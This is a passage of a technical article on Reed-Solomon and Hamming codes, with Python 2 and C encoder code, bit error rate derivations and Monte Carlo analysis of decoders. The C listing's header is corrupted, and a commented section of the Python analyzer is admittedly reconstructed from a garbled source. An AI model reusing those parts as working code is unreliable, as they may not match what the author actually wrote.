af 43 86 11 22 44 88 0d 1a 34 68 d0 bd 67 ce 112-127: 81 1f 3e 7c f8 ed c7 93 3b 76 ec c5 97 33 66 cc 128-143: 85 17 2e 5c b8 6d da a9 4f 9e 21 42 84 15 2a 54 144-159: a8 4d 9a 29 52 a4 55 aa 49 92 39 72 e4 d5 b7 73 160-175: e6 d1 bf 63 c6 91 3f 7e fc e5 d7 b3 7b f6 f1 ff 176-191: e3 db ab 4b 96 31 62 c4 95 37 6e dc a5 57 ae 41 192-207: 82 19 32 64 c8 8d 07 0e 1c 38 70 e0 dd a7 53 a6 208-223: 51 a2 59 b2 79 f2 f9 ef c3 9b 2b 56 ac 45 8a 09 224-239: 12 24 48 90 3d 7a f4 f5 f7 f3 fb eb cb 8b 0b 16 240-255: 2c 58 b0 7d fa e9 cf 83 1b 36 6c d8 ad 47 8e 00
gpowers = [log[c] for c in g[-2::-1]]
print "generator polynomial coefficient indices: ", gpowers
print "remainder:"
print rsencode_lfsr3(log, antilog, gpowers, msg, remainder_only=True).encode('hex')
print "calculated earlier:"
print remainder.encode('hex')
generator polynomial coefficient indices:  [120, 104, 107, 109, 102, 161, 76, 3, 91, 191, 147, 169, 182, 194, 225, 120]
remainder:
552ca3b464003a52c45011f46e0fea9b
calculated earlier:
552ca3b464003a52c45011f46e0fea9b
There. It’s very simple; the hardest thing here is making sure you get the coefficients in the right order. You wouldn’t want to get those the wrong way around.
C Implementation
I tested a C implementation using XC16 and the MPLAB X debugger:
""" C code for reed-solomon.c: /* * * Copyright 2018 Jason M. Sachint.h> #include <stddef.h> #include <string.h> /** * Reed-Solomon log-table-based implementation */ typedef struct { uint8_t log[256]; uint8_t antilog[256]; uint8_t symbol_polynomial; const uint8_t *gpowers; uint8_t generator_degree; } rslogtable_t; /** * Initialize log table * * @param ptables - points to log tables * @param symbol_polynomial: lower 8 bits of symbol polynomial * (for example, 0x1d for 0x11d = x^8 + x^4 + x^3 + x^2 + 1 * @param gpowers - points to generator polynomial coefficients, * except for the leading monomial, * in descending order, expressed as powers of x in the symbol field. * This requires all generator polynomial coefficients to be nonzero. * @param generator_degree - degree of the generator polynomial, * which is also the length of the gpowers array. */ void rslogtable_init( rslogtable_t *ptables, uint8_t symbol_polynomial, const uint8_t *gpowers, uint8_t generator_degree ) { ptables->symbol_polynomial = symbol_polynomial; ptables->gpowers = gpowers; ptables->generator_degree = generator_degree; int k; uint8_t c = 1; for (k = 0; k < 255; ++k) { ptables->antilog[k] = c; ptables->log[c] = k; if (c >> 7) { c <<= 1; c ^= symbol_polynomial; } else { c <<= 1; } } ptables->log[0] = 0; ptables->antilog[255] = 0; } /** * Encode a message * * @param ptables - pointer to table-based lookup info * @param pmessage - message to be encoded * @param message_length - length of the message * @param premainder - buffer which will be filled in with the remainder. * This must have a size equal to ptables->generator_degree */ void rslogtable_encode( const rslogtable_t *ptables, const uint8_t *pmessage, size_t message_length, uint8_t *premainder ) { int i, j, k, n; int highbyte; const int t2 = ptables->generator_degree; const int lastindex = t2-1; // Zero out the remainder for (i = 0; i < t2; ++i) { premainder[i] = 0; } n = message_length + t2; for (i = 0; i < n; ++i) { uint8_t c = (i < message_length) ? pmessage[i] : 0; highbyte = premainder[0]; if (highbyte == 0) { // No multiplication, just a simple shift for (k = 0; k < lastindex; ++k) { premainder[k] = premainder[k+1]; } premainder[lastindex] = c; } else { uint8_t log_highbyte = ptables->log[highbyte]; for (k = 0; k < lastindex; ++k) { j = ptables->gpowers[k] + (int)log_highbyte; if (j >= 255) j -= 255; premainder[k] = premainder[k+1] ^ ptables->antilog[j]; } j = ptables->gpowers[lastindex] + (int)log_highbyte; if (j >= 255) j -= 255; premainder[lastindex] = c ^ ptables->antilog[j]; } } } uint8_t rsremainder[16]; void rslogtable_test(void) { const uint8_t gpowers[] = { 120, 104, 107, 109, 102, 161, 76, 3, 91, 191, 147, 169, 182, 194, 225, 120 }; rslogtable_t rsinfo; rslogtable_init(&rsinfo, 0x1d, gpowers, 16); const char message[] = "Ernie, you have a banana in your ear!"; rslogtable_encode(&rsinfo, (const uint8_t *)message, strlen(message), rsremainder); __builtin_nop(); } """;
It worked as expected.
Again, this is only the encoder, but remember the asymmetry here:
- encoder = cheap resource-limited processor
- decoder = desktop PC CPU
And we can still do error correction!
Is It Worth It?
Is encoding worth the effort?
Wait. We got all the way through Part XV and well into this article, you say, and he’s asking is it worth it?!
Yes, that’s the question. We got a benefit, namely the ability to detect and sometimes even correct errors, but it has a cost. We have to send extra information, and that uses up part of the available communications bandwidth. And we had to add some complexity. Is it a net gain?
There are at least two ways of looking at this cost-benefit tradeoff, and it depends on what the constraints are.
The first way of analyzing cost-benefits is to consider a situation where we’re given a transmitter/receiver pair, and all we have control over is the digital part of the system that handles the bits that are sent. Error correcting codes like Reed-Solomon give us the ability to lower the error rate substantially — and we’ll calculate this in just a minute — with only a slight decrease in transmission rate. A \( (255, 239) \) Reed-Solomon code lets us correct up to 8 errors in each block of 255 bytes, with 93.7% of the transmission capacity of the uncoded channel. The encoding complexity cost is minimal, and the decoding cost is small enough to merit use of Reed-Solomon decoders in higher-end embedded systems or in desktop computers.
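Those two numbers are just arithmetic, if you want to double-check them:

n, k = 255, 239
print (n-k)//2                 # 8 correctable errors per 255-byte block
print '%.1f%%' % (100.0*k/n)   # 93.7% of the uncoded transmission capacity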
The second way of analyzing cost-benefits is to consider a situation where we have control over the transmitter energy, as well as the digital encoding/decoding mechanisms. We can lower the error rate by using an error-correcting code, or we can increase the transmitter energy to improve the signal-to-noise ratio. The Shannon-Hartley theorem, which says channel capacity \( C \leq B \log_2 (1+\frac{S}{N}) \), can help us quantitatively compare those possibilities. The standard metric is \( E_b/N_0 \) in decibels, so let’s try to frame things in terms of it. First we have to understand what it is.
One common assumption in communications is an additive white Gaussian noise (AWGN) channel, which has some amount of noise \( N_0 \) per unit bandwidth. (This is why oscilloscopes let you limit the bandwidth: if you don’t need the full bandwidth, limiting it reduces the noise level.) In any case, if we have an integrate-and-dump receiver, where we integrate our received signal, and every \( T \) seconds we sample the integrator value, divide by \( T \) to compute an average value over the interval, and reset the integrator, then the received noise can be modeled as a Gaussian random variable with zero mean and variance of \( \sigma_N^2 = \frac{N_0}{2T} \). (This can be computed from \( \sigma_N^2 = \frac{N_0}{2}\int_{-\infty}^{\infty}\left|h(t)\right|^2\, dt \) with \( h(t) \) of the integrate-and-dump filter being a unit rectangular pulse of duration \( T \) and height \( 1/T \).)
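If you’d rather see that variance formula verified numerically than derived, here’s a little Monte Carlo sketch of my own (the values of \( N_0 \) and \( T \) are arbitrary):

import numpy as np

np.random.seed(0)
N0, T, nsteps = 2.0, 1e-3, 100
dt = T/nsteps
# discrete-time white noise with two-sided density N0/2:
# each sample has variance (N0/2)/dt
noise = np.sqrt(N0/2/dt) * np.random.randn(20000, nsteps)
y = noise.sum(axis=1)*dt/T    # integrate over T seconds, divide by T
print y.var(), N0/(2*T)       # both should be close to 1000.0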
The signal waveform has some energy \( E_b \) per bit. Consider a raw binary pulse signal \( x(t) = \pm A \) for a duration of \( T \) seconds for each bit, with \( +A \) representing a binary 1 and \( -A \) representing a binary 0. If we compute \( E_b = \int_{-\infty}^{\infty}\left|x(t)\right|^2\, dt \) we get \( E_b = A^2T \). The integrate-and-dump receiver outputs a 1 if its output sample is positive, and 0 if its output sample is negative. We get a bit flip if the received noise is less than \( -A \) for a transmitted 1 bit, or greater than \( A \) for a transmitted 0 bit. This probability is just the Q-function evaluated at \( Q(A/\sigma_N) = Q(\sqrt{A^2/\sigma_N{}^2}) = Q(\sqrt{(E_b/T)/(N_0/2T)}) = Q(\sqrt{2E_b/N_0}). \)
In other words, if we know how bits are represented as signals, we can determine the probability of a bit error just by knowing what \( E_b/N_0 \) is.
Let’s graph it!
Bit Error Rate Calculations Are the Bane of My Existence
Just one quick aside: this section showing bit error rate graphs was a beastly thing to manage. Don’t worry about the Python code, or how the calculations work, unless you want to enter this quagmire. Otherwise, just look at the pretty pictures, and my descriptions of how to interpret them.
As I was saying, let’s graph it!
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
%matplotlib inline
import scipy.stats

def Q(x):
    return scipy.stats.norm.cdf(-x)

def Qinv(x):
    return -scipy.stats.norm.ppf(x)

ebno_db = np.arange(-6,12,0.01)
ebno = 10**(ebno_db/10)
# Decibels are often confusing.
# dB = 10 log10 x if x is measured in energy
# dB = 20 log10 x if x is measured in amplitude.
plt.semilogy(ebno_db, Q(np.sqrt(2*ebno)))
plt.ylabel('Bit error rate',fontsize=12)
plt.xlabel('$E_b/N_0$ (dB)',fontsize=12)
plt.grid('on')
plt.title('Bit error rate for raw binary pulses in AWGN channel\n'
          +'with integrate-and-dump receiver');
If we have a nice healthy noise margin of 12dB for \( E_b/N_0 \), then the bit error rate is \( 9.0\times 10^{-9} \), or one error in 110 million. Again, this is just raw binary pulses using an integrate-and-dump receiver. More complex signal shaping techniques like quadrature amplitude modulation can make better use of available spectrum. But that’s an article for someone else to write.
With an \( E_b/N_0 \) ratio of 1 (that’s 0dB), probability of a bit error is around 0.079, or about one in 12. Lousy. You want a lower error rate? Put more energy into the signal, or make sure there’s less energy in noise.
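Both of those numbers are easy to double-check with the Q function defined above:

print Q(np.sqrt(2*10**(12/10.)))   # at 12dB: about 9.0e-9
print Q(np.sqrt(2*10**(0/10.)))    # at 0dB: about 0.079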
Okay, now suppose we use a Hamming (7,4) code. Let’s say, for example, that the raw bit error rate is 0.01, which occurs at about \( E_b/N_0 \approx 4.3 \)dB. With the Hamming (7,4) code, we can correct one error, so there are a few cases to consider for an upper bound that is conservative and assumes some worst-case conditions:
- There were no received bit errors. Probability of this is \( (1-0.01)^7 \approx 0.932065. \) The receiver will output 4 correct output bits, and there are no errors after decoding
- There was one received bit error, in one of the seven codeword bits. Probability of this is \( 7\cdot 0.01\cdot(1-0.01)^6 \approx 0.065904. \) The receiver will output 4 correct output bits, and there are no errors after decoding.
- There are two or more received bit errors. Probability of this is \( \approx 0.002031 \). We don’t know how many correct output bits the receiver will produce; a true analysis is complicated. Let’s just assume, as a worst-case estimate, we’ll receive no correct output bits, so there are 4 errors after decoding.
In this case the worst-case expected number of errors in the output bits is 4 × 0.002031 ≈ 0.0081 per 4-bit block, or 0.002031 per output bit.
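Here’s that arithmetic spelled out, if you want to check it:

p = 0.01
p0 = (1-p)**7          # no received bit errors
p1 = 7*p*(1-p)**6      # exactly one received bit error (corrected)
p2plus = 1 - p0 - p1   # two or more received bit errors
print p0, p1, p2plus   # 0.932065..., 0.065904..., 0.002031...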
We went from a bit error rate of 0.01 down to about 0.002031, which is good, right? The only drawback is that to send 4 data bits we had to transmit 7 bits, so the transmitted energy per data bit is a factor of 7/4 higher.
We can find the expected number of errors more precisely if we look at the received error count for each combination of the 128 possible error patterns, and compute the “weighted count” W as the sum of the received error counts, weighted by the number of patterns that cause that combination of raw and received error count:
# stuff from Part X
H74_stats = (H74_table
             .groupby(['raw_error_count','received_error_count'])
             .agg({'pattern': 'count'})
             .rename(columns={'pattern':'count'}))
H74_stats
H74a = H74_stats.reset_index()
H74b_data = [('raw_error_count', H74a['raw_error_count']),
             ('weighted_count',)]
H74b = ((H74a['received_error_count']*H74a['count'])
        .groupby(H74a['raw_error_count'])
        .agg({'weighted_count':'sum'}))
H74b
This then lets us calculate the net error rate as \( (W_0(1-p)^7 + W_1 p(1-p)^6 + W_2 p^2(1-p)^5 + \ldots + W_6p^6(1-p) + W_7p^7) / 4 \):
W = H74b['weighted_count']
p = 0.01
r = sum(W[i]*(1-p)**(7-i)*p**i for i in xrange(8))/4
r
0.00087429879999999997
Even better!
Now let’s look at that bit error rate graph again, this time with both the curve for uncoded data, and with another curve representing the use of a Hamming (7,4) code.
# Helper functions for analyzing small Hamming codes (7,4) and (15,11)
# and Reed-Solomon(255,k) codes
import scipy.misc
import scipy.stats

class HammingAnalyzer(object):
    def __init__(self, poly):
        self.qr = GF2QuotientRing(poly)
        self.nparity = self.qr.degree
        self.n = (1 << self.nparity) - 1
        self.k = self.n - self.nparity
        self.beta = self._calculate_beta()
        assert self.decode(1<<self.k) == 0
        self.W = None

    def _calculate_beta(self):
        syndrome_msb = self.calculate_syndrome(1<<self.k)
        msb_pattern = self.qr.lshiftraw(1, self.k)
        beta = self.qr.divraw(msb_pattern, syndrome_msb)
        # Beta is calculated such that beta * syndrome(M) = M
        # for M = a codeword of all zeros with bit k = 1
        # (all data bits are zero)
        return beta

    def calculate_syndrome(self, codeword):
        syndrome = 0
        bitpos = 1 << self.n
        # clock in the codeword, then enough bits to cover the parity bits
        for _ in xrange(self.n + self.nparity):
            syndrome = self.qr.lshiftraw1(syndrome)
            if codeword & bitpos:
                syndrome ^= 1
            bitpos >>= 1
        return syndrome

    def decode(self, codeword, return_syndrome=False):
        syndrome = self.calculate_syndrome(codeword)
        data = codeword & ((1<<self.k) - 1)
        if syndrome == 0:
            error_pos = None
        else:
            # there are easier ways of computing a correction
            # to the data bits (I'm just not familiar with them)
            error_pos = self.qr.log(self.qr.mulraw(syndrome,self.beta))
            if error_pos < self.k:
                data ^= (1<<error_pos)
        if return_syndrome:
            return data, syndrome, error_pos
        else:
            return data

    def analyze_patterns(self):
        data_mask = (1<<self.k) - 1
        syndrome_to_correction_mask = np.zeros(1<<self.nparity, dtype=int)
        npatterns = (1<<self.n)
        patterns = np.arange(npatterns)
        syndromes = np.zeros(npatterns, dtype=int)
        bit_counts = np.zeros(npatterns, dtype=int)
        for i in xrange(self.n):
            error_pattern = 1<<i
            data, syndrome, error_pos = self.decode(error_pattern,
                                                    return_syndrome=True)
            # NOTE: the next few lines are a reconstruction (an assumption);
            # this passage was garbled in the source.
            syndrome_to_correction_mask[syndrome] = error_pattern & data_mask
            has_bit = (patterns >> i) & 1
            syndromes ^= has_bit * syndrome
            bit_counts += has_bit
        correction_mask = syndrome_to_correction_mask[syndromes]
        corrected_patterns = patterns ^ correction_mask
        # determine the number of errors in the corrected data bits
        received_error_count = bit_counts[corrected_patterns & data_mask]
        return pd.DataFrame(dict(pattern=patterns,
                                 raw_error_count=bit_counts,
                                 correction_mask=correction_mask,
                                 corrected_pattern=corrected_patterns,
                                 received_error_count=received_error_count
                                 ),
                            columns=['pattern',
                                     'correction_mask','corrected_pattern',
                                     'raw_error_count','received_error_count'])

    def analyze_stats(self):
        stats = (self.analyze_patterns()
                 .groupby(['raw_error_count','received_error_count'])
                 .agg({'pattern': 'count'})
                 .rename(columns={'pattern':'count'}))
        Ha = stats.reset_index()
        Hb = ((Ha['received_error_count']*Ha['count'])
              .groupby(Ha['raw_error_count'])
              .agg({'weighted_count':'sum'}))
        return Hb

    def bit_error_rate(self, p, **args):
        """ calculate data error rate given raw bit error rate p """
        if self.W is None:
            self.W = self.analyze_stats()['weighted_count']
        return sum(self.W[i]*(1-p)**(self.n-i)*p**i
                   for i in xrange(self.n+1))/self.k

    @property
    def codename(self):
        return 'Hamming (%d,%d)' % (self.n, self.k)

    @property
    def rate(self):
        return 1.0*self.k/self.n


class ReedSolomonAnalyzer(object):
    def __init__(self, n, k):
        self.n = n
        self.k = k
        self.t = (n-k)//2

    def bit_error_rate(self, p, **args):
        r = 0
        n = self.n
        ptotal = 0
        # Probability of byte errors
        # = 1-(1-p)^8
        # but we need to calculate it more robustly
        # for small values of p
        q = -np.expm1(8*np.log1p(-p))
        qlist = [1.0]
        for v in xrange(n):
            qlist_new = [0]*(v+2)
            qlist_new[0] = qlist[0]*(1-q)
            qlist_new[v+1] = qlist[v]*q
            for i in xrange(1, v+1):
                qlist_new[i] = qlist[i]*(1-q) + qlist[i-1]*q
            qlist = qlist_new
        for v in xrange(n+1):
            # v errors
            w = self.output_error_count(v)
            pv = qlist[v]
            ptotal += pv
            r += w*pv
        # r is the expected number of data bit errors
        # (can't be worse than 0.5 per bit)
        return np.minimum(0.5, r*1.0/self.k/8)

    @property
    def rate(self):
        return 1.0*self.k/self.n


class ReedSolomonWorstCaseAnalyzer(ReedSolomonAnalyzer):
    @property
    def codename(self):
        return 'RS (%d,%d) worstcase' % (self.n, self.k)

    def output_error_count(self, v):
        if v <= self.t:
            return 0
        # Pessimistic: if we have over t errors,
        # we correct the wrong t ones.
        # Oh, and it messes up the whole byte.
        return 8*min(self.k, v + self.t)


class ReedSolomonBestCaseAnalyzer(ReedSolomonAnalyzer):
    @property
    def codename(self):
        return 'RS (%d,%d) bestcase' % (self.n, self.k)

    def output_error_count(self, v):
        # Optimistic: we always correct up to t errors,
        # and each of the symbol errors affects only 1 bit.
        return max(0, v-self.t)


class ReedSolomonMonteCarloAnalyzer(ReedSolomonAnalyzer):
    def __init__(self, decoder):
        super(ReedSolomonMonteCarloAnalyzer, self).__init__(decoder.n, decoder.k)
        self.decoder = decoder

    @property
    def codename(self):
        return 'RS (%d,%d) Monte Carlo' % (self.n, self.k)

    def _sim(self, v, nsim, audit=False):
        """
        Run random samples of decoding v bit errors from the zero codeword
        v: number of bit errors
        nsim: number of trials
        audit: whether to double-check that the 'where' array is correct
          (this is a temporary variable used to locate errors)

        Returns success_histogram: histogram of corrected codewords
                failure_histogram: histogram of uncorrected codewords

        For each trial we determine the number of bit errors ('count')
        in the corrected (or uncorrected) data. If the Reed-Solomon
        decoding succeeds, we add a sample to the success histogram,
        otherwise we add it to the failure histogram.

        Example: [4,0,0,5,1,6] indicates 4 samples with no bit errors,
        5 samples with 3 bit errors, 1 sample with 4 bit errors,
        6 samples with 5 bit errors.
        """
        decoder = self.decoder
        n = decoder.n
        k = decoder.k
        success_histogram = np.array([0], int)
        failure_histogram = np.array([0], int)
        failures = 0
        for _ in xrange(nsim):
            # Construct received message
            error_bitpos = np.random.choice(n*8, v, replace=False)
            e = np.zeros((v,n), int)
            e[np.arange(v), error_bitpos//8] = 1 << (error_bitpos & 7)
            e = e.sum(axis=0)
            # Decode received message
            try:
                msg, r = decoder.decode(e, nostrip=True, return_string=False)
                d = np.array(msg, dtype=np.uint8)
                # d = np.frombuffer(msg, dtype=np.uint8)
                success = True
            except:
                # Decoding error. Just use raw received message.
                d = e[:k]
                success = False
            where = np.array([(d>>j) & 1 for j in xrange(8)])
            count = int(where.sum())
            if success:
                if count >= len(success_histogram):
                    success_histogram.resize(count+1)
                success_histogram[count] += 1
            else:
                # yes this is essentially repeated code
                # but resize() is much easier
                # if we only have 1 object reference
                if count >= len(failure_histogram):
                    failure_histogram.resize(count+1)
                failure_histogram[count] += 1
            if audit:
                d2 = d.copy()
                bitlist,bytelist = where.nonzero()
                for bit,i in zip(bitlist,bytelist):
                    d2[i] ^= 1<<bit
                assert not d2.any()
        return success_histogram, failure_histogram

    def _simulate_errors(self, nsimlist, verbose=False):
        decoder = self.decoder
        t = (decoder.n - decoder.k)//2
        results = []
        for i,nsim in enumerate(nsimlist):
            v = t+i
            if verbose:
                print "RS(%d,%d), %d errors (%d samples)" % (
                    decoder.n, decoder.k, v, nsim)
            results.append(self._sim(v, nsim))
        return results

    def set_simulation_sample_counts(self, nsimlist):
        self.nsimlist = nsimlist
        return self

    def simulate(self, nsimlist=None, verbose=False):
        if nsimlist is None:
            nsimlist = self.nsimlist
        self.simulation_results = self._simulate_errors(nsimlist, verbose)
        return self

    def bit_error_rate(self, p, pbinom=None, **args):
        # Redone in terms of bit errors
        r = 0
        ptotal = 0
        p = np.atleast_1d(p)
        if pbinom is None:
            ncheck = 500
            pbinom = scipy.stats.binom.pmf(
                np.atleast_2d(np.arange(ncheck)).T, self.n*8, p)
        else:
            ncheck = len(pbinom)  # so ncheck is defined if pbinom is passed in
        for v in xrange(ncheck):
            # v errors
            w = self.output_error_count(v)
            pv = pbinom[v,:]
            ptotal += pv
            r += w*pv
        # r is the expected number of data bit errors
        # (can't be worse than 0.5 per bit)
        return np.minimum(0.5, r*1.0/self.k/8)

    def output_error_count(self, v):
        # Estimate the number of data bit errors for v transmission bit errors.
        t = self.t
        if v <= t:
            return 0
        simr = self.simulation_results
        if v-t < len(simr):
            sh, fh = simr[v-t]
            ns = sum(sh)
            ls = len(sh)
            nf = sum(fh)
            lf = len(fh)
            wt = ((sh*np.arange(ls)).sum()
                  +(fh*np.arange(lf)).sum()) * 1.0/(ns+nf)
            return wt
        else:
            # dumb estimate: same number of input errors
            return v
ebno_db = np.arange(-6,15,0.01)
ebno = 10**(ebno_db/10)
# Decibels are often confusing.
# dB = 10 log10 x if x is measured in energy
# dB = 20 log10 x if x is measured in amplitude.

def dBE(x):
    return 10*np.log10(x)

# Raw bit error probability
p = Q(np.sqrt(2*ebno))
# Probability of at least 1 error:
# This would be 1 - (1-p)^7
# but it's numerically problematic for low values of p.
pH74_any_error = -np.expm1(7*np.log1p(-p))
pH74_upper_bound = pH74_any_error - 7*p*(1-p)**6
ha74 = HammingAnalyzer(0b1011)
pH74 = ha74.bit_error_rate(p)

plt.semilogy(dBE(ebno), p, label='uncoded')
plt.semilogy(dBE(ebno*7/4), pH74_upper_bound, '--',
             label='Hamming (7,4) upper bound')
plt.semilogy(dBE(ebno*7/4), pH74, label='Hamming (7,4)')
plt.ylabel('Bit error rate',fontsize=12)
plt.xlabel('$E_b/N_0$ (dB)',fontsize=12)
plt.xlim(-6,14)
plt.xticks(np.arange(-6,15,2))
plt.ylim(1e-12,1)
plt.legend(loc='lower left',fontsize=10)
plt.grid('on')
plt.title('Bit error rate for raw binary pulses in AWGN channel\n'
          +'with integrate-and-dump receiver');
The exact calculation and the upper bound are fairly close to each other.
We can do something similar with Reed-Solomon error rates. For an \( (n,k) = (255,255-2t) \) Reed-Solomon code, with transmitted bit error probability \( p \), the error probability per byte is \( q = 1 - (1-p)^8 \), and there are a couple of situations, given the number of byte errors \( v \) per 255-byte block:
- \( v \le t \): Reed-Solomon will decode them all correctly, and the number of decoded byte errors is zero.
- \( v > t \): More than \( t \) byte errors: This is the tricky part.
- Best-case estimate: we are lucky and the decoder actually corrects \( t \) errors, leading to \( v-t \) errors. This is ludicrously optimistic, but it does represent a lower bound on the bit error rate.
- Worst-case estimate: we are unlucky and the decoder alters \( t \) values which were correct, leading to \( v+t \) errors. This is ludicrously pessimistic, but it does represent an upper bound on the bit error rate.
- Empirical estimate: we can actually generate some random samples covering various numbers of errors, and see what a decoder actually does, then use the results to extrapolate a data bit error rate. This will be closer to the expected results, but it can take quite a bit of computation to generate enough random samples and run the decoder algorithm.
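To make those bounds concrete: here’s what the best-case and worst-case estimates give for \( RS(255,239) \) with, say, 10 byte errors in a block, using the analyzer classes defined above.

wc = ReedSolomonWorstCaseAnalyzer(255, 239)
bc = ReedSolomonBestCaseAnalyzer(255, 239)
print wc.output_error_count(10)  # 8*min(239, 10+8) = 144 bit errors (pessimistic)
print bc.output_error_count(10)  # 10-8 = 2 bit errors (optimistic)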
OK, now we’re going to tie all this together and show four graphs:
- Bit error rate of the decoded data (after error correction) vs. raw bit error rate during transmission. This tells us how much the error rate decreases.
- One graph will show large scale error rates.
- Another will show the same data in closer detail.
- Bit error rate of the decoded data vs. \( E_b/N_0 \). This lets us compare bit error rates by how much transmit energy they require to achieve that error rate.
- Effective gain in \( E_b/N_0 \), in decibels, vs. bit error rate of the decoded data.
# Codes under analysis:
class RawAnalyzer(object):
    def bit_error_rate(self, p):
        return p
    @property
    def codename(self):
        return 'uncoded'
    @property
    def rate(self):
        return 1

ha74 = HammingAnalyzer(0b1011)
ha1511 = HammingAnalyzer(0b10011)
analyzers = [RawAnalyzer(),
             ha74,
             ha1511,
             ReedSolomonWorstCaseAnalyzer(255,253),
             ReedSolomonBestCaseAnalyzer(255,253),
             ReedSolomonMonteCarloAnalyzer(
                 rs.RSCoder(255,253,generator=2,prim=0x11d,fcr=0,c_exp=8))
               .set_simulation_sample_counts([10]
                   +[10000,5000,2000,1000,1000,1000,1000,1000]
                   +[100]*10),
             ReedSolomonWorstCaseAnalyzer(255,251),
             ReedSolomonBestCaseAnalyzer(255,251),
             ReedSolomonMonteCarloAnalyzer(
                 rs.RSCoder(255,251,generator=2,prim=0x11d,fcr=0,c_exp=8))
               .set_simulation_sample_counts([10]
                   +[10000,5000,2000,1000,1000,1000,1000,1000]
                   +[100]*5),
             ReedSolomonWorstCaseAnalyzer(255,247),
             ReedSolomonBestCaseAnalyzer(255,247),
             ReedSolomonMonteCarloAnalyzer(
                 rs.RSCoder(255,247,generator=2,prim=0x11d,fcr=0,c_exp=8))
               .set_simulation_sample_counts([10]
                   +[10000,5000,2000,1000,1000,1000,1000,1000]
                   +[100]*5),
             ReedSolomonWorstCaseAnalyzer(255,239),
             ReedSolomonBestCaseAnalyzer(255,239),
             ReedSolomonMonteCarloAnalyzer(
                 rs.RSCoder(255,239,generator=2,prim=0x11d,fcr=0,c_exp=8))
               .set_simulation_sample_counts([10]
                   +[10000,5000,2000,1000,1000,1000,1000,1000]),
             ReedSolomonWorstCaseAnalyzer(255,223),
             ReedSolomonBestCaseAnalyzer(255,223),
             ReedSolomonMonteCarloAnalyzer(
                 rs.RSCoder(255,223,generator=2,prim=0x11d,fcr=0,c_exp=8))
               .set_simulation_sample_counts([10]
                   +[5000,2000,1000,500,500,500,500,500]),
             ReedSolomonWorstCaseAnalyzer(255,191),
             ReedSolomonBestCaseAnalyzer(255,191),
             ReedSolomonMonteCarloAnalyzer(
                 rs.RSCoder(255,191,generator=2,prim=0x11d,fcr=0,c_exp=8))
               .set_simulation_sample_counts([10]
                   +[2000,1000,500,500,500,500,500,500]),
            ]

styles = ['k','r','g',
          'b--','b--','b',
          'c--','c--','c',
          'm--','m--','m',
          '#88ff00--','#88ff00--','#88ff00',
          '#ff8800--','#ff8800--','#ff8800',
          '#888888--','#888888--','#888888']
# Sigh. This takes a while.
import time

for analyzer in analyzers:
    if hasattr(analyzer, 'simulate'):
        print "RS(%d,%d)" % (analyzer.n, analyzer.k)
        np.random.seed(123)  # just to make the Monte Carlo analysis repeatable
        t0 = time.time()
        analyzer.simulate()
        t1 = time.time()
        print "%.2f seconds" % (t1-t0)
RS(255,253)
42.47 seconds
RS(255,251)
44.90 seconds
RS(255,247)
62.66 seconds
RS(255,239)
151.81 seconds
RS(255,223)
197.57 seconds
RS(255,191)
470.05 seconds
ebno_db = np.arange(-6,18,0.02)
ebno = 10**(ebno_db/10)
# Decibels are often confusing.
# dB = 10 log10 x if x is measured in energy
# dB = 20 log10 x if x is measured in amplitude.

# Raw bit error probability
p = Q(np.sqrt(2*ebno))
# Binomial distribution -- this is used by the RS Monte Carlo analyzers
pbinom = scipy.stats.binom.pmf(np.atleast_2d(np.arange(800)).T,255*8,p)
error_rates = [analyzer.bit_error_rate(p) for analyzer in analyzers]
colors = [s[:-2] if s.endswith('--') else s for s in styles]
linestyles = ['--' if s.endswith('--') else '-' for s in styles]

def label_for(analyzer):
    codename = analyzer.codename
    if codename.endswith(' worstcase'):
        return None
    elif codename.endswith(' bestcase'):
        return codename[:-8] + 'bounds'
    else:
        return codename

# 1a and 1b. Raw vs. derived probability
for xscale,yscale in [(1e-12,1e-20),(1e-5,1e-8)]:
    fig = plt.figure(figsize=(7,6))
    ax = fig.add_subplot(1,1,1)
    for i, analyzer in enumerate(analyzers):
        p2 = error_rates[i]
        ax.loglog(p, p2, color=colors[i], linestyle=linestyles[i],
                  label=label_for(analyzer))
    ax.set_xlabel('Raw bit error rate')
    ax.set_ylabel('Data bit error rate')
    ax.legend(loc='upper left',fontsize=8, labelspacing=0, handlelength=3)
    ax.grid('on')
    ax.set_title('Code effect on data bit error rate')
    ax.set_xlim(xscale,0.5)
    ax.set_ylim(yscale,1)

# 2. Data error rate vs. Eb/N0
fig = plt.figure(figsize=(7,6))
ax = fig.add_subplot(1,1,1)
for i, analyzer in enumerate(analyzers):
    p2 = error_rates[i]
    ax.semilogy(dBE(ebno/analyzer.rate), p2, color=colors[i],
                linestyle=linestyles[i], label=label_for(analyzer))
ax.set_ylabel('Data bit error rate',fontsize=12)
ax.set_xlabel('$E_b/N_0$ (dB)',fontsize=12)
ax.set_xlim(-6,14)
ax.set_xticks(np.arange(-6,15,2))
ax.set_ylim(1e-12,1)
ax.legend(loc='lower left',fontsize=8, labelspacing=0, handlelength=3)
ax.grid('on')
ax.set_title('Data bit error rate for raw binary pulses in AWGN channel\n'
             +'with integrate-and-dump receiver');

# 3. Eb/No gain vs. data error rate
fig = plt.figure(figsize=(7,6))
ax = fig.add_subplot(1,1,1)
for i, analyzer in enumerate(analyzers):
    p2 = error_rates[i]
    ebno_equiv = Qinv(p2)**2/2
    ax.semilogx(p2, dBE(ebno_equiv*analyzer.rate/ebno),
                color=colors[i], linestyle=linestyles[i],
                label=label_for(analyzer))
ax.set_xlim(1e-16,0.5)
ax.set_ylim(-8,10)
ax.set_yticks(np.arange(-8,10.1,2))
ax.legend(loc='lower left',fontsize=8, labelspacing=0, handlelength=3)
ax.set_xlabel('Data bit error rate', fontsize=12)
ax.set_ylabel('Gain (dB)', fontsize=12)
ax.grid('on')
ax.set_title('Effective $E_b/N_0$ gain vs data bit error rate');
OK, so what are we looking at here?
The top two graphs show us a few things:
At low channel bit error rates (= “raw bit error rate”), the effective data bit error rate can be made much lower. For example, at a \( 10^{-4} \) channel bit error rate, a Hamming (7,4) code can bring the effective data bit error rate down to about \( 10^{-7} \), and an RS(255,239) code can bring the effective data bit error rate down to about \( 10^{-14} \). Much lower, and we don’t have to sacrifice much bandwidth to do it; the code rate of RS(255,239) is 239/255 ≈ 0.9373.
At high channel bit error rates, on the other hand, the effective data bit error rate may not be much better, and may even be a little higher than the channel data bit error rate. It looks like on average this could be about a factor of 2 worse, in the cases of low-robustness Reed-Solomon codes like RS(255,253) and RS(255,251).
